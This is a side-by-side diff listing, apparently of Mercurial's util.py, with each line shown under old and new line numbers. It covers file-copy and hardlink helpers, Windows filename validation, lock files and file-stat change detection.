1184 def checksignature(func):
1180 '''wrap a function with code to check for calling errors'''
1185 '''wrap a function with code to check for calling errors'''
1181 def check(*args, **kwargs):
1186 def check(*args, **kwargs):
1182 try:
1187 try:
1183 return func(*args, **kwargs)
1188 return func(*args, **kwargs)
1184 except TypeError:
1189 except TypeError:
1185 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1190 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1186 raise error.SignatureError
1191 raise error.SignatureError
1187 raise
1192 raise
1188
1193
1189 return check
1194 return check
1190
1195
1191 # a whilelist of known filesystems where hardlink works reliably
1196 # a whilelist of known filesystems where hardlink works reliably
1192 _hardlinkfswhitelist = {
1197 _hardlinkfswhitelist = {
1193 'btrfs',
1198 'btrfs',
1194 'ext2',
1199 'ext2',
1195 'ext3',
1200 'ext3',
1196 'ext4',
1201 'ext4',
1197 'hfs',
1202 'hfs',
1198 'jfs',
1203 'jfs',
1199 'reiserfs',
1204 'reiserfs',
1200 'tmpfs',
1205 'tmpfs',
1201 'ufs',
1206 'ufs',
1202 'xfs',
1207 'xfs',
1203 'zfs',
1208 'zfs',
1204 }
1209 }
1205
1210
1206 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1211 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1207 '''copy a file, preserving mode and optionally other stat info like
1212 '''copy a file, preserving mode and optionally other stat info like
1208 atime/mtime
1213 atime/mtime
1209
1214
1210 checkambig argument is used with filestat, and is useful only if
1215 checkambig argument is used with filestat, and is useful only if
1211 destination file is guarded by any lock (e.g. repo.lock or
1216 destination file is guarded by any lock (e.g. repo.lock or
1212 repo.wlock).
1217 repo.wlock).
1213
1218
1214 copystat and checkambig should be exclusive.
1219 copystat and checkambig should be exclusive.
1215 '''
1220 '''
1216 assert not (copystat and checkambig)
1221 assert not (copystat and checkambig)
1217 oldstat = None
1222 oldstat = None
1218 if os.path.lexists(dest):
1223 if os.path.lexists(dest):
1219 if checkambig:
1224 if checkambig:
1220 oldstat = checkambig and filestat.frompath(dest)
1225 oldstat = checkambig and filestat.frompath(dest)
1221 unlink(dest)
1226 unlink(dest)
1222 if hardlink:
1227 if hardlink:
1223 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1228 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1224 # unless we are confident that dest is on a whitelisted filesystem.
1229 # unless we are confident that dest is on a whitelisted filesystem.
1225 try:
1230 try:
1226 fstype = getfstype(os.path.dirname(dest))
1231 fstype = getfstype(os.path.dirname(dest))
1227 except OSError:
1232 except OSError:
1228 fstype = None
1233 fstype = None
1229 if fstype not in _hardlinkfswhitelist:
1234 if fstype not in _hardlinkfswhitelist:
1230 hardlink = False
1235 hardlink = False
1231 if hardlink:
1236 if hardlink:
1232 try:
1237 try:
1233 oslink(src, dest)
1238 oslink(src, dest)
1234 return
1239 return
1235 except (IOError, OSError):
1240 except (IOError, OSError):
1236 pass # fall back to normal copy
1241 pass # fall back to normal copy
1237 if os.path.islink(src):
1242 if os.path.islink(src):
1238 os.symlink(os.readlink(src), dest)
1243 os.symlink(os.readlink(src), dest)
1239 # copytime is ignored for symlinks, but in general copytime isn't needed
1244 # copytime is ignored for symlinks, but in general copytime isn't needed
1240 # for them anyway
1245 # for them anyway
1241 else:
1246 else:
1242 try:
1247 try:
1243 shutil.copyfile(src, dest)
1248 shutil.copyfile(src, dest)
1244 if copystat:
1249 if copystat:
1245 # copystat also copies mode
1250 # copystat also copies mode
1246 shutil.copystat(src, dest)
1251 shutil.copystat(src, dest)
1247 else:
1252 else:
1248 shutil.copymode(src, dest)
1253 shutil.copymode(src, dest)
1249 if oldstat and oldstat.stat:
1254 if oldstat and oldstat.stat:
1250 newstat = filestat.frompath(dest)
1255 newstat = filestat.frompath(dest)
1251 if newstat.isambig(oldstat):
1256 if newstat.isambig(oldstat):
1252 # stat of copied file is ambiguous to original one
1257 # stat of copied file is ambiguous to original one
1253 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1258 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1254 os.utime(dest, (advanced, advanced))
1259 os.utime(dest, (advanced, advanced))
1255 except shutil.Error as inst:
1260 except shutil.Error as inst:
1256 raise Abort(str(inst))
1261 raise Abort(str(inst))
1257
1262
1258 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1263 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1259 """Copy a directory tree using hardlinks if possible."""
1264 """Copy a directory tree using hardlinks if possible."""
1260 num = 0
1265 num = 0
1261
1266
1262 gettopic = lambda: hardlink and _('linking') or _('copying')
1267 gettopic = lambda: hardlink and _('linking') or _('copying')
1263
1268
1264 if os.path.isdir(src):
1269 if os.path.isdir(src):
1265 if hardlink is None:
1270 if hardlink is None:
1266 hardlink = (os.stat(src).st_dev ==
1271 hardlink = (os.stat(src).st_dev ==
1267 os.stat(os.path.dirname(dst)).st_dev)
1272 os.stat(os.path.dirname(dst)).st_dev)
1268 topic = gettopic()
1273 topic = gettopic()
1269 os.mkdir(dst)
1274 os.mkdir(dst)
1270 for name, kind in listdir(src):
1275 for name, kind in listdir(src):
1271 srcname = os.path.join(src, name)
1276 srcname = os.path.join(src, name)
1272 dstname = os.path.join(dst, name)
1277 dstname = os.path.join(dst, name)
1273 def nprog(t, pos):
1278 def nprog(t, pos):
1274 if pos is not None:
1279 if pos is not None:
1275 return progress(t, pos + num)
1280 return progress(t, pos + num)
1276 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1281 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1277 num += n
1282 num += n
1278 else:
1283 else:
1279 if hardlink is None:
1284 if hardlink is None:
1280 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1285 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1281 os.stat(os.path.dirname(dst)).st_dev)
1286 os.stat(os.path.dirname(dst)).st_dev)
1282 topic = gettopic()
1287 topic = gettopic()
1283
1288
1284 if hardlink:
1289 if hardlink:
1285 try:
1290 try:
1286 oslink(src, dst)
1291 oslink(src, dst)
1287 except (IOError, OSError):
1292 except (IOError, OSError):
1288 hardlink = False
1293 hardlink = False
1289 shutil.copy(src, dst)
1294 shutil.copy(src, dst)
1290 else:
1295 else:
1291 shutil.copy(src, dst)
1296 shutil.copy(src, dst)
1292 num += 1
1297 num += 1
1293 progress(topic, num)
1298 progress(topic, num)
1294 progress(topic, None)
1299 progress(topic, None)
1295
1300
1296 return hardlink, num
1301 return hardlink, num
1297
1302
1298 _winreservednames = {
1303 _winreservednames = {
1299 'con', 'prn', 'aux', 'nul',
1304 'con', 'prn', 'aux', 'nul',
1300 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1305 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1301 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1306 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1302 }
1307 }
1303 _winreservedchars = ':*?"<>|'
1308 _winreservedchars = ':*?"<>|'
1304 def checkwinfilename(path):
1309 def checkwinfilename(path):
1305 r'''Check that the base-relative path is a valid filename on Windows.
1310 r'''Check that the base-relative path is a valid filename on Windows.
1306 Returns None if the path is ok, or a UI string describing the problem.
1311 Returns None if the path is ok, or a UI string describing the problem.
1307
1312
1308 >>> checkwinfilename(b"just/a/normal/path")
1313 >>> checkwinfilename(b"just/a/normal/path")
1309 >>> checkwinfilename(b"foo/bar/con.xml")
1314 >>> checkwinfilename(b"foo/bar/con.xml")
1310 "filename contains 'con', which is reserved on Windows"
1315 "filename contains 'con', which is reserved on Windows"
1311 >>> checkwinfilename(b"foo/con.xml/bar")
1316 >>> checkwinfilename(b"foo/con.xml/bar")
1312 "filename contains 'con', which is reserved on Windows"
1317 "filename contains 'con', which is reserved on Windows"
1313 >>> checkwinfilename(b"foo/bar/xml.con")
1318 >>> checkwinfilename(b"foo/bar/xml.con")
1314 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1319 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1315 "filename contains 'AUX', which is reserved on Windows"
1320 "filename contains 'AUX', which is reserved on Windows"
1316 >>> checkwinfilename(b"foo/bar/bla:.txt")
1321 >>> checkwinfilename(b"foo/bar/bla:.txt")
1317 "filename contains ':', which is reserved on Windows"
1322 "filename contains ':', which is reserved on Windows"
1318 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1323 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1319 "filename contains '\\x07', which is invalid on Windows"
1324 "filename contains '\\x07', which is invalid on Windows"
1320 >>> checkwinfilename(b"foo/bar/bla ")
1325 >>> checkwinfilename(b"foo/bar/bla ")
1321 "filename ends with ' ', which is not allowed on Windows"
1326 "filename ends with ' ', which is not allowed on Windows"
1322 >>> checkwinfilename(b"../bar")
1327 >>> checkwinfilename(b"../bar")
1323 >>> checkwinfilename(b"foo\\")
1328 >>> checkwinfilename(b"foo\\")
1324 "filename ends with '\\', which is invalid on Windows"
1329 "filename ends with '\\', which is invalid on Windows"
1325 >>> checkwinfilename(b"foo\\/bar")
1330 >>> checkwinfilename(b"foo\\/bar")
1326 "directory name ends with '\\', which is invalid on Windows"
1331 "directory name ends with '\\', which is invalid on Windows"
1327 '''
1332 '''
1328 if path.endswith('\\'):
1333 if path.endswith('\\'):
1329 return _("filename ends with '\\', which is invalid on Windows")
1334 return _("filename ends with '\\', which is invalid on Windows")
1330 if '\\/' in path:
1335 if '\\/' in path:
1331 return _("directory name ends with '\\', which is invalid on Windows")
1336 return _("directory name ends with '\\', which is invalid on Windows")
1332 for n in path.replace('\\', '/').split('/'):
1337 for n in path.replace('\\', '/').split('/'):
1333 if not n:
1338 if not n:
1334 continue
1339 continue
1335 for c in _filenamebytestr(n):
1340 for c in _filenamebytestr(n):
1336 if c in _winreservedchars:
1341 if c in _winreservedchars:
1337 return _("filename contains '%s', which is reserved "
1342 return _("filename contains '%s', which is reserved "
1338 "on Windows") % c
1343 "on Windows") % c
1339 if ord(c) <= 31:
1344 if ord(c) <= 31:
1340 return _("filename contains '%s', which is invalid "
1345 return _("filename contains '%s', which is invalid "
1341 "on Windows") % escapestr(c)
1346 "on Windows") % escapestr(c)
1342 base = n.split('.')[0]
1347 base = n.split('.')[0]
1343 if base and base.lower() in _winreservednames:
1348 if base and base.lower() in _winreservednames:
1344 return _("filename contains '%s', which is reserved "
1349 return _("filename contains '%s', which is reserved "
1345 "on Windows") % base
1350 "on Windows") % base
1346 t = n[-1:]
1351 t = n[-1:]
1347 if t in '. ' and n not in '..':
1352 if t in '. ' and n not in '..':
1348 return _("filename ends with '%s', which is not allowed "
1353 return _("filename ends with '%s', which is not allowed "
1349 "on Windows") % t
1354 "on Windows") % t
1350
1355
1351 if pycompat.iswindows:
1356 if pycompat.iswindows:
1352 checkosfilename = checkwinfilename
1357 checkosfilename = checkwinfilename
1353 timer = time.clock
1358 timer = time.clock
1354 else:
1359 else:
1355 checkosfilename = platform.checkosfilename
1360 checkosfilename = platform.checkosfilename
1356 timer = time.time
1361 timer = time.time
1357
1362
1358 if safehasattr(time, "perf_counter"):
1363 if safehasattr(time, "perf_counter"):
1359 timer = time.perf_counter
1364 timer = time.perf_counter
1360
1365
1361 def makelock(info, pathname):
1366 def makelock(info, pathname):
1362 try:
1367 try:
1363 return os.symlink(info, pathname)
1368 return os.symlink(info, pathname)
1364 except OSError as why:
1369 except OSError as why:
1365 if why.errno == errno.EEXIST:
1370 if why.errno == errno.EEXIST:
1366 raise
1371 raise
1367 except AttributeError: # no symlink in os
1372 except AttributeError: # no symlink in os
1368 pass
1373 pass
1369
1374
1370 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1375 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1371 os.write(ld, info)
1376 os.write(ld, info)
1372 os.close(ld)
1377 os.close(ld)
1373
1378
1374 def readlock(pathname):
1379 def readlock(pathname):
1375 try:
1380 try:
1376 return os.readlink(pathname)
1381 return os.readlink(pathname)
1377 except OSError as why:
1382 except OSError as why:
1378 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1383 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1379 raise
1384 raise
1380 except AttributeError: # no symlink in os
1385 except AttributeError: # no symlink in os
1381 pass
1386 pass
1382 fp = posixfile(pathname)
1387 fp = posixfile(pathname)
1383 r = fp.read()
1388 r = fp.read()
1384 fp.close()
1389 fp.close()
1385 return r
1390 return r
1386
1391
1387 def fstat(fp):
1392 def fstat(fp):
1388 '''stat file object that may not have fileno method.'''
1393 '''stat file object that may not have fileno method.'''
1389 try:
1394 try:
1390 return os.fstat(fp.fileno())
1395 return os.fstat(fp.fileno())
1391 except AttributeError:
1396 except AttributeError:
1392 return os.stat(fp.name)
1397 return os.stat(fp.name)
1393
1398
1394 # File system features
1399 # File system features
1395
1400
1396 def fscasesensitive(path):
1401 def fscasesensitive(path):
1397 """
1402 """
1398 Return true if the given path is on a case-sensitive filesystem
1403 Return true if the given path is on a case-sensitive filesystem
1399
1404
1400 Requires a path (like /foo/.hg) ending with a foldable final
1405 Requires a path (like /foo/.hg) ending with a foldable final
1401 directory component.
1406 directory component.
1402 """
1407 """
1403 s1 = os.lstat(path)
1408 s1 = os.lstat(path)
1404 d, b = os.path.split(path)
1409 d, b = os.path.split(path)
1405 b2 = b.upper()
1410 b2 = b.upper()
1406 if b == b2:
1411 if b == b2:
1407 b2 = b.lower()
1412 b2 = b.lower()
1408 if b == b2:
1413 if b == b2:
1409 return True # no evidence against case sensitivity
1414 return True # no evidence against case sensitivity
1410 p2 = os.path.join(d, b2)
1415 p2 = os.path.join(d, b2)
1411 try:
1416 try:
1412 s2 = os.lstat(p2)
1417 s2 = os.lstat(p2)
1413 if s2 == s1:
1418 if s2 == s1:
1414 return False
1419 return False
1415 return True
1420 return True
1416 except OSError:
1421 except OSError:
1417 return True
1422 return True
1418
1423
1419 try:
1424 try:
1420 import re2
1425 import re2
1421 _re2 = None
1426 _re2 = None
1422 except ImportError:
1427 except ImportError:
1423 _re2 = False
1428 _re2 = False
1424
1429
1425 class _re(object):
1430 class _re(object):
1426 def _checkre2(self):
1431 def _checkre2(self):
1427 global _re2
1432 global _re2
1428 try:
1433 try:
1429 # check if match works, see issue3964
1434 # check if match works, see issue3964
1430 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1435 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1431 except ImportError:
1436 except ImportError:
1432 _re2 = False
1437 _re2 = False
1433
1438
1434 def compile(self, pat, flags=0):
1439 def compile(self, pat, flags=0):
1435 '''Compile a regular expression, using re2 if possible
1440 '''Compile a regular expression, using re2 if possible
1436
1441
1437 For best performance, use only re2-compatible regexp features. The
1442 For best performance, use only re2-compatible regexp features. The
1438 only flags from the re module that are re2-compatible are
1443 only flags from the re module that are re2-compatible are
1439 IGNORECASE and MULTILINE.'''
1444 IGNORECASE and MULTILINE.'''
1440 if _re2 is None:
1445 if _re2 is None:
1441 self._checkre2()
1446 self._checkre2()
1442 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1447 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1443 if flags & remod.IGNORECASE:
1448 if flags & remod.IGNORECASE:
1444 pat = '(?i)' + pat
1449 pat = '(?i)' + pat
1445 if flags & remod.MULTILINE:
1450 if flags & remod.MULTILINE:
1446 pat = '(?m)' + pat
1451 pat = '(?m)' + pat
1447 try:
1452 try:
1448 return re2.compile(pat)
1453 return re2.compile(pat)
1449 except re2.error:
1454 except re2.error:
1450 pass
1455 pass
1451 return remod.compile(pat, flags)
1456 return remod.compile(pat, flags)
1452
1457
1453 @propertycache
1458 @propertycache
1454 def escape(self):
1459 def escape(self):
1455 '''Return the version of escape corresponding to self.compile.
1460 '''Return the version of escape corresponding to self.compile.
1456
1461
1457 This is imperfect because whether re2 or re is used for a particular
1462 This is imperfect because whether re2 or re is used for a particular
1458 function depends on the flags, etc, but it's the best we can do.
1463 function depends on the flags, etc, but it's the best we can do.
1459 '''
1464 '''
1460 global _re2
1465 global _re2
1461 if _re2 is None:
1466 if _re2 is None:
1462 self._checkre2()
1467 self._checkre2()
1463 if _re2:
1468 if _re2:
1464 return re2.escape
1469 return re2.escape
1465 else:
1470 else:
1466 return remod.escape
1471 return remod.escape
1467
1472
1468 re = _re()
1473 re = _re()
1469
1474
1470 _fspathcache = {}
1475 _fspathcache = {}
1471 def fspath(name, root):
1476 def fspath(name, root):
1472 '''Get name in the case stored in the filesystem
1477 '''Get name in the case stored in the filesystem
1473
1478
1474 The name should be relative to root, and be normcase-ed for efficiency.
1479 The name should be relative to root, and be normcase-ed for efficiency.
1475
1480
1476 Note that this function is unnecessary, and should not be
1481 Note that this function is unnecessary, and should not be
1477 called, for case-sensitive filesystems (simply because it's expensive).
1482 called, for case-sensitive filesystems (simply because it's expensive).
1478
1483
1479 The root should be normcase-ed, too.
1484 The root should be normcase-ed, too.
1480 '''
1485 '''
1481 def _makefspathcacheentry(dir):
1486 def _makefspathcacheentry(dir):
1482 return dict((normcase(n), n) for n in os.listdir(dir))
1487 return dict((normcase(n), n) for n in os.listdir(dir))
1483
1488
1484 seps = pycompat.ossep
1489 seps = pycompat.ossep
1485 if pycompat.osaltsep:
1490 if pycompat.osaltsep:
1486 seps = seps + pycompat.osaltsep
1491 seps = seps + pycompat.osaltsep
1487 # Protect backslashes. This gets silly very quickly.
1492 # Protect backslashes. This gets silly very quickly.
1488 seps.replace('\\','\\\\')
1493 seps.replace('\\','\\\\')
1489 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1494 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1490 dir = os.path.normpath(root)
1495 dir = os.path.normpath(root)
1491 result = []
1496 result = []
1492 for part, sep in pattern.findall(name):
1497 for part, sep in pattern.findall(name):
1493 if sep:
1498 if sep:
1494 result.append(sep)
1499 result.append(sep)
1495 continue
1500 continue
1496
1501
1497 if dir not in _fspathcache:
1502 if dir not in _fspathcache:
1498 _fspathcache[dir] = _makefspathcacheentry(dir)
1503 _fspathcache[dir] = _makefspathcacheentry(dir)
1499 contents = _fspathcache[dir]
1504 contents = _fspathcache[dir]
1500
1505
1501 found = contents.get(part)
1506 found = contents.get(part)
1502 if not found:
1507 if not found:
1503 # retry "once per directory" per "dirstate.walk" which
1508 # retry "once per directory" per "dirstate.walk" which
1504 # may take place for each patches of "hg qpush", for example
1509 # may take place for each patches of "hg qpush", for example
1505 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1510 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1506 found = contents.get(part)
1511 found = contents.get(part)
1507
1512
1508 result.append(found or part)
1513 result.append(found or part)
1509 dir = os.path.join(dir, part)
1514 dir = os.path.join(dir, part)
1510
1515
1511 return ''.join(result)
1516 return ''.join(result)
1512
1517
1513 def getfstype(dirpath):
1518 def getfstype(dirpath):
1514 '''Get the filesystem type name from a directory (best-effort)
1519 '''Get the filesystem type name from a directory (best-effort)
1515
1520
1516 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1521 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1517 '''
1522 '''
1518 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1523 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1519
1524
1520 def checknlink(testfile):
1525 def checknlink(testfile):
1521 '''check whether hardlink count reporting works properly'''
1526 '''check whether hardlink count reporting works properly'''
1522
1527
1523 # testfile may be open, so we need a separate file for checking to
1528 # testfile may be open, so we need a separate file for checking to
1524 # work around issue2543 (or testfile may get lost on Samba shares)
1529 # work around issue2543 (or testfile may get lost on Samba shares)
1525 f1, f2, fp = None, None, None
1530 f1, f2, fp = None, None, None
1526 try:
1531 try:
1527 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1532 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1528 suffix='1~', dir=os.path.dirname(testfile))
1533 suffix='1~', dir=os.path.dirname(testfile))
1529 os.close(fd)
1534 os.close(fd)
1530 f2 = '%s2~' % f1[:-2]
1535 f2 = '%s2~' % f1[:-2]
1531
1536
1532 oslink(f1, f2)
1537 oslink(f1, f2)
1533 # nlinks() may behave differently for files on Windows shares if
1538 # nlinks() may behave differently for files on Windows shares if
1534 # the file is open.
1539 # the file is open.
1535 fp = posixfile(f2)
1540 fp = posixfile(f2)
1536 return nlinks(f2) > 1
1541 return nlinks(f2) > 1
1537 except OSError:
1542 except OSError:
1538 return False
1543 return False
1539 finally:
1544 finally:
1540 if fp is not None:
1545 if fp is not None:
1541 fp.close()
1546 fp.close()
1542 for f in (f1, f2):
1547 for f in (f1, f2):
1543 try:
1548 try:
1544 if f is not None:
1549 if f is not None:
1545 os.unlink(f)
1550 os.unlink(f)
1546 except OSError:
1551 except OSError:
1547 pass
1552 pass
1548
1553
1549 def endswithsep(path):
1554 def endswithsep(path):
1550 '''Check path ends with os.sep or os.altsep.'''
1555 '''Check path ends with os.sep or os.altsep.'''
1551 return (path.endswith(pycompat.ossep)
1556 return (path.endswith(pycompat.ossep)
1552 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1557 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1553
1558
1554 def splitpath(path):
1559 def splitpath(path):
1555 '''Split path by os.sep.
1560 '''Split path by os.sep.
1556 Note that this function does not use os.altsep because this is
1561 Note that this function does not use os.altsep because this is
1557 an alternative of simple "xxx.split(os.sep)".
1562 an alternative of simple "xxx.split(os.sep)".
1558 It is recommended to use os.path.normpath() before using this
1563 It is recommended to use os.path.normpath() before using this
1559 function if need.'''
1564 function if need.'''
1560 return path.split(pycompat.ossep)
1565 return path.split(pycompat.ossep)
1561
1566
1562 def gui():
1567 def gui():
1563 '''Are we running in a GUI?'''
1568 '''Are we running in a GUI?'''
1564 if pycompat.isdarwin:
1569 if pycompat.isdarwin:
1565 if 'SSH_CONNECTION' in encoding.environ:
1570 if 'SSH_CONNECTION' in encoding.environ:
1566 # handle SSH access to a box where the user is logged in
1571 # handle SSH access to a box where the user is logged in
1567 return False
1572 return False
1568 elif getattr(osutil, 'isgui', None):
1573 elif getattr(osutil, 'isgui', None):
1569 # check if a CoreGraphics session is available
1574 # check if a CoreGraphics session is available
1570 return osutil.isgui()
1575 return osutil.isgui()
1571 else:
1576 else:
1572 # pure build; use a safe default
1577 # pure build; use a safe default
1573 return True
1578 return True
1574 else:
1579 else:
1575 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1580 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1576
1581
1577 def mktempcopy(name, emptyok=False, createmode=None):
1582 def mktempcopy(name, emptyok=False, createmode=None):
1578 """Create a temporary file with the same contents from name
1583 """Create a temporary file with the same contents from name
1579
1584
1580 The permission bits are copied from the original file.
1585 The permission bits are copied from the original file.
1581
1586
1582 If the temporary file is going to be truncated immediately, you
1587 If the temporary file is going to be truncated immediately, you
1583 can use emptyok=True as an optimization.
1588 can use emptyok=True as an optimization.
1584
1589
1585 Returns the name of the temporary file.
1590 Returns the name of the temporary file.
1586 """
1591 """
1587 d, fn = os.path.split(name)
1592 d, fn = os.path.split(name)
1588 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1593 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1589 os.close(fd)
1594 os.close(fd)
1590 # Temporary files are created with mode 0600, which is usually not
1595 # Temporary files are created with mode 0600, which is usually not
1591 # what we want. If the original file already exists, just copy
1596 # what we want. If the original file already exists, just copy
1592 # its mode. Otherwise, manually obey umask.
1597 # its mode. Otherwise, manually obey umask.
1593 copymode(name, temp, createmode)
1598 copymode(name, temp, createmode)
1594 if emptyok:
1599 if emptyok:
1595 return temp
1600 return temp
1596 try:
1601 try:
1597 try:
1602 try:
1598 ifp = posixfile(name, "rb")
1603 ifp = posixfile(name, "rb")
1599 except IOError as inst:
1604 except IOError as inst:
1600 if inst.errno == errno.ENOENT:
1605 if inst.errno == errno.ENOENT:
1601 return temp
1606 return temp
1602 if not getattr(inst, 'filename', None):
1607 if not getattr(inst, 'filename', None):
1603 inst.filename = name
1608 inst.filename = name
1604 raise
1609 raise
1605 ofp = posixfile(temp, "wb")
1610 ofp = posixfile(temp, "wb")
1606 for chunk in filechunkiter(ifp):
1611 for chunk in filechunkiter(ifp):
1607 ofp.write(chunk)
1612 ofp.write(chunk)
1608 ifp.close()
1613 ifp.close()
1609 ofp.close()
1614 ofp.close()
1610 except: # re-raises
1615 except: # re-raises
1611 try:
1616 try:
1612 os.unlink(temp)
1617 os.unlink(temp)
1613 except OSError:
1618 except OSError:
1614 pass
1619 pass
1615 raise
1620 raise
1616 return temp
1621 return temp
1617
1622
1618 class filestat(object):
1623 class filestat(object):
1619 """help to exactly detect change of a file
1624 """help to exactly detect change of a file
1620
1625
1621 'stat' attribute is result of 'os.stat()' if specified 'path'
1626 'stat' attribute is result of 'os.stat()' if specified 'path'
1622 exists. Otherwise, it is None. This can avoid preparative
1627 exists. Otherwise, it is None. This can avoid preparative
1623 'exists()' examination on client side of this class.
1628 'exists()' examination on client side of this class.
1624 """
1629 """
1625 def __init__(self, stat):
1630 def __init__(self, stat):
1626 self.stat = stat
1631 self.stat = stat
1627
1632
1628 @classmethod
1633 @classmethod
1629 def frompath(cls, path):
1634 def frompath(cls, path):
1630 try:
1635 try:
1631 stat = os.stat(path)
1636 stat = os.stat(path)
1632 except OSError as err:
1637 except OSError as err:
1633 if err.errno != errno.ENOENT:
1638 if err.errno != errno.ENOENT:
1634 raise
1639 raise
1635 stat = None
1640 stat = None
1636 return cls(stat)
1641 return cls(stat)
1637
1642
1638 @classmethod
1643 @classmethod
1639 def fromfp(cls, fp):
1644 def fromfp(cls, fp):
1640 stat = os.fstat(fp.fileno())
1645 stat = os.fstat(fp.fileno())
1641 return cls(stat)
1646 return cls(stat)
1642
1647
1643 __hash__ = object.__hash__
1648 __hash__ = object.__hash__
1644
1649
1645 def __eq__(self, old):
1650 def __eq__(self, old):
1646 try:
1651 try:
1647 # if ambiguity between stat of new and old file is
1652 # if ambiguity between stat of new and old file is
1648 # avoided, comparison of size, ctime and mtime is enough
1653 # avoided, comparison of size, ctime and mtime is enough
1649 # to exactly detect change of a file regardless of platform
1654 # to exactly detect change of a file regardless of platform
1650 return (self.stat.st_size == old.stat.st_size and
1655 return (self.stat.st_size == old.stat.st_size and
1651 self.stat.st_ctime == old.stat.st_ctime and
1656 self.stat.st_ctime == old.stat.st_ctime and
1652 self.stat.st_mtime == old.stat.st_mtime)
1657 self.stat.st_mtime == old.stat.st_mtime)
1653 except AttributeError:
1658 except AttributeError:
1654 pass
1659 pass
1655 try:
1660 try:
1656 return self.stat is None and old.stat is None
1661 return self.stat is None and old.stat is None
1657 except AttributeError:
1662 except AttributeError:
1658 return False
1663 return False
1659
1664
1660 def isambig(self, old):
1665 def isambig(self, old):
1661 """Examine whether new (= self) stat is ambiguous against old one
1666 """Examine whether new (= self) stat is ambiguous against old one
1662
1667
1663 "S[N]" below means stat of a file at N-th change:
1668 "S[N]" below means stat of a file at N-th change:
1664
1669
1665 - S[n-1].ctime < S[n].ctime: can detect change of a file
1670 - S[n-1].ctime < S[n].ctime: can detect change of a file
1666 - S[n-1].ctime == S[n].ctime
1671 - S[n-1].ctime == S[n].ctime
1667 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1672 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1668 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1673 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1669 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1674 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1670 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1675 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1671
1676
1672 Case (*2) above means that a file was changed twice or more at
1677 Case (*2) above means that a file was changed twice or more at
1673 same time in sec (= S[n-1].ctime), and comparison of timestamp
1678 same time in sec (= S[n-1].ctime), and comparison of timestamp
1674 is ambiguous.
1679 is ambiguous.
1675
1680
1676 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1681 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1677 timestamp is ambiguous".
1682 timestamp is ambiguous".
1678
1683
1679 But advancing mtime only in case (*2) doesn't work as
1684 But advancing mtime only in case (*2) doesn't work as
1680 expected, because naturally advanced S[n].mtime in case (*1)
1685 expected, because naturally advanced S[n].mtime in case (*1)
1681 might be equal to manually advanced S[n-1 or earlier].mtime.
1686 might be equal to manually advanced S[n-1 or earlier].mtime.
1682
1687
1683 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1688 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1684 treated as ambiguous regardless of mtime, to avoid overlooking
1689 treated as ambiguous regardless of mtime, to avoid overlooking
1685 by confliction between such mtime.
1690 by confliction between such mtime.
1686
1691
1687 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1692 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1688 S[n].mtime", even if size of a file isn't changed.
1693 S[n].mtime", even if size of a file isn't changed.
1689 """
1694 """
